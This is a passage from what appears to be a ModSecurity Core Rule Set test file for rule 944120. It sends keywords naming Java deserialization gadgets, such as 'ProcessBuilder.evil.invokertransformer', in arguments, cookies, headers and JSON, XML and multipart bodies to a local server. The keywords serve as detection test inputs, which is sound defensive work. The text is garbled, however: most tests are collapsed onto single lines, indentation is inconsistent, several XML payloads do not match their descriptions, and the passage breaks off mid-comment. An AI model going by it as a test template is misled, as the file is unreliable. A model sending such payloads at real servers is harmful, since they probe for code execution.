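ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\""
# The line above is the tail of test 944120-75, which starts before this
# span; it is left as found. Tests 944120-76 to 944120-82 below are laid out
# one key per line. Each sends one POST to 127.0.0.1:80 and expects rule id
# 944120 in the log.

# 944120-76 / 944120-77: application/xml bodies.
# NOTE(review): both data values are the bare keyword with no XML markup, so
# the two tests are identical as shown; the markup described in desc appears
# to have been lost in this copy - compare with the repository file.
- test_title: 944120-76
  desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/xml"
          method: "POST"
          version: "HTTP/1.0"
          data: "ProcessBuilder.evil.invokertransformer"
        output:
          log_contains: "id \"944120\""

- test_title: 944120-77
  desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/xml"
          method: "POST"
          version: "HTTP/1.0"
          data: "ProcessBuilder.evil.invokertransformer"
        output:
          log_contains: "id \"944120\""

# 944120-78: keyword in a text/plain request body.
- test_title: 944120-78
  desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "text/plain"
          method: "POST"
          version: "HTTP/1.0"
          data: "test=ProcessBuilder.evil.invokertransformer"
        output:
          log_contains: "id \"944120\""

# 944120-79: application/json body, keyword as a member value.
- test_title: 944120-79
  desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/json"
          method: "POST"
          version: "HTTP/1.0"
          data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}"
        output:
          log_contains: "id \"944120\""

# 944120-80: application/json body, keyword as a member name.
- test_title: 944120-80
  desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/json"
          method: "POST"
          version: "HTTP/1.0"
          data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}"
        output:
          log_contains: "id \"944120\""

# 944120-81: multipart part "payload" declared as application/json; the
# keyword is the JSON member name.
- test_title: 944120-81
  desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
          method: "POST"
          version: "HTTP/1.0"
          # NOTE(review): the blank line between the part headers and the part
          # body is restored as multipart syntax requires; the collapsed source
          # shows no line breaks - confirm against the repository copy.
          data: |
            -----------------------------thisissparta
            Content-Disposition: form-data; name="payload"
            Content-Type: application/json

            {"ProcessBuilder.evil.invokertransformer": "test"}
            -----------------------------thisissparta--
        output:
          log_contains: "id \"944120\""

# 944120-82: same request shape, keyword in the JSON member VALUE so that the
# payload matches desc; the member-name position is covered by 944120-81.
# NOTE(review): log_contains is kept on the assumption that the rule inspects
# the whole part body (the multipart XML element-value tests for this keyword
# expect a match on a part body) - confirm with a test run.
- test_title: 944120-82
  desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
          method: "POST"
          version: "HTTP/1.0"
          data: |
            -----------------------------thisissparta
            Content-Disposition: form-data; name="payload"
            Content-Type: application/json

            {"test": "ProcessBuilder.evil.invokertransformer"}
            -----------------------------thisissparta--
        output:
          log_contains: "id \"944120\""

# Head of test 944120-83; the rest of it follows this span. Left as found.
- test_title: 944120-83 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data;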
boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.invokertransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-84 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.invokertransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-85 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeclonefactory" output: log_contains: "id \"944120\"" - test_title: 944120-86 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: 
"localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory=test" output: log_contains: "id \"944120\"" - test_title: 944120-87 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.prototypeclonefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-88 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.prototypeclonefactory=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-89 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.prototypeclonefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-90 desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-91 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-92 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" 
Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-93 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory" output: log_contains: "id \"944120\"" - test_title: 944120-94 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory" output: log_contains: "id \"944120\"" - test_title: 944120-95 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeclonefactory" output: log_contains: "id 
\"944120\"" - test_title: 944120-96 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" output: log_contains: "id \"944120\"" - test_title: 944120-97 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-98 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; 
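name="payload" Content-Type: application/json {"ProcessBuilder.evil.prototypeclonefactory": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\""
  # 944120-99: multipart/form-data part carrying JSON with the keyword as the
  # JSON *value*. The keyword is placed in the value (not the key) so this case
  # differs from the preceding arg-name test (944120-98) and matches the layout
  # of the plain application/json arg-value test (944120-96).
  - test_title: 944120-99
    desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/json

              {"test": "ProcessBuilder.evil.prototypeclonefactory"}
              -----------------------------thisissparta--
          output:
            # Positive test: rule 944120 must appear in the log.
            log_contains: "id \"944120\""
  # 944120-100: multipart/form-data part declared as application/xml.
  # NOTE(review): no XML tags surround the keyword in this part body although
  # the desc says "XML element value"; confirm the payload against the
  # upstream test file.
  - test_title: 944120-100
    desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/xml

              ProcessBuilder.evil.prototypeclonefactory
              -----------------------------thisissparta--
          output:
            # Positive test: rule 944120 must appear in the log.
            log_contains: "id \"944120\""
- test_title: 944120-101 desc: "Content-Type multipart/form-data XML element value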
includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.prototypeclonefactory -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-102 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeserializationfactory" output: log_contains: "id \"944120\"" - test_title: 944120-103 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: 
"ProcessBuilder.evil.prototypeserializationfactory=test" output: log_contains: "id \"944120\"" - test_title: 944120-104 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.prototypeserializationfactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-105 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.prototypeserializationfactory=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-106 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.prototypeserializationfactory 
method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-107 desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-108 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-109 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-110 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: 
input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory" output: log_contains: "id \"944120\"" - test_title: 944120-111 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory" output: log_contains: "id \"944120\"" - test_title: 944120-112 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeserializationfactory" output: log_contains: "id \"944120\"" - test_title: 944120-113 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: 
"ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" output: log_contains: "id \"944120\"" - test_title: 944120-114 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-115 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.prototypeserializationfactory": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 
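944120-116
    # 944120-116: multipart/form-data part carrying JSON with the keyword as
    # the JSON *value*. The keyword is placed in the value (not the key) so
    # this case differs from the preceding arg-name test (944120-115) and
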